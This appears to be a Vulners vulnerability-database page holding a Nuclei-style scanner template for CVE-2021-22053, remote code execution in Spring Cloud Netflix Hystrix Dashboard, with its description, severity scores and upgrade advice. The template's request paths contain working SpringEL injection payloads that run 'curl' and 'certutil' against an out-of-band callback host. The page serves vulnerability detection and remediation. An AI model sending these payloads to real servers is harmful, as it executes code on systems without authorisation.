Vulners
Lucene search
Spring Cloud Netflix Hystrix Dashboard <2.2.10 - Remote Code Execution
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
 | Security Bulletin: IBM Data Risk Manager is affected by multiple vulnerabilities | 13 Jan 202215:19 | – | ibm |
 | CVE-2021-22053 | 19 Nov 202118:23 | – | circl |
 | VMware Spring Cloud Netflix 代码注入漏洞 | 19 Nov 202100:00 | – | cnnvd |
 | VMware Spring Cloud Netflix Remote Code Execution (CVE-2021-22053) | 27 Dec 202100:00 | – | checkpoint_advisories |
 | CVE-2021-22053 | 19 Nov 202115:56 | – | cve |
 | CVE-2021-22053 | 19 Nov 202115:56 | – | cvelist |
 | Code injection in spring-cloud-netflix-hystrix-dashboard | 23 Nov 202117:53 | – | github |
 | CVE-2021-22053 | 19 Nov 202116:15 | – | nvd |
 | CVE-2021-22053 | 19 Nov 202116:15 | – | osv |
| GHSA-GX3F-HQ7P-8FXV Code injection in spring-cloud-netflix-hystrix-dashboard | 23 Nov 202117:53 | – | osv |
10
id: CVE-2021-22053
info:
name: Spring Cloud Netflix Hystrix Dashboard <2.2.10 - Remote Code Execution
author: forgedhallpass
severity: high
description: |
Spring Cloud Netflix Hystrix Dashboard prior to version 2.2.10 is susceptible to remote code execution. Applications using both `spring-cloud-netflix-hystrix-dashboard` and `spring-boot-starter-thymeleaf` expose a way to execute code submitted within the request URI path during the resolution of view templates. When a request is made at `/hystrix/monitor;[user-provided data]`, the path elements following `hystrix/monitor` are being evaluated as SpringEL expressions, which can lead to code execution.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
remediation: |
Upgrade to Spring Cloud Netflix Hystrix Dashboard version 2.2.10 or later to mitigate this vulnerability.
reference:
- https://github.com/SecCoder-Security-Lab/spring-cloud-netflix-hystrix-dashboard-cve-2021-22053
- https://tanzu.vmware.com/security/cve-2021-22053
- https://nvd.nist.gov/vuln/detail/CVE-2021-22053
- https://github.com/trhacknon/Pocingit
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2021-22053
cwe-id: CWE-94
epss-score: 0.89561
epss-percentile: 0.99572
cpe: cpe:2.3:a:vmware:spring_cloud_netflix:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: vmware
product: spring_cloud_netflix
tags: cve,cve2021,rce,spring,vmware,vkev,vuln
http:
- method: GET
path:
- '{{BaseURL}}/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec("curl http://{{interactsh-url}}")}__::.x/'
- '{{BaseURL}}/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec("certutil -urlcache -split -f http://{{interactsh-url}}")}__::.x/'
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: regex
part: interactsh_request
regex:
- 'User-Agent: (curl|CertUtil)'
# digest: 490a00463044022022ed8a997dd92196fd0cedfd75477743aa6038d8096985e7792b5ac203e9cd5602206f863487dde7073f7cf82418e47a02ba4ce5b4383b90a25c411d78f4f7396750:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 Feb 2026 07:00Current
7.5High risk
Vulners AI Score7.5
CVSS 26.5
CVSS 3.18.8
EPSS0.89561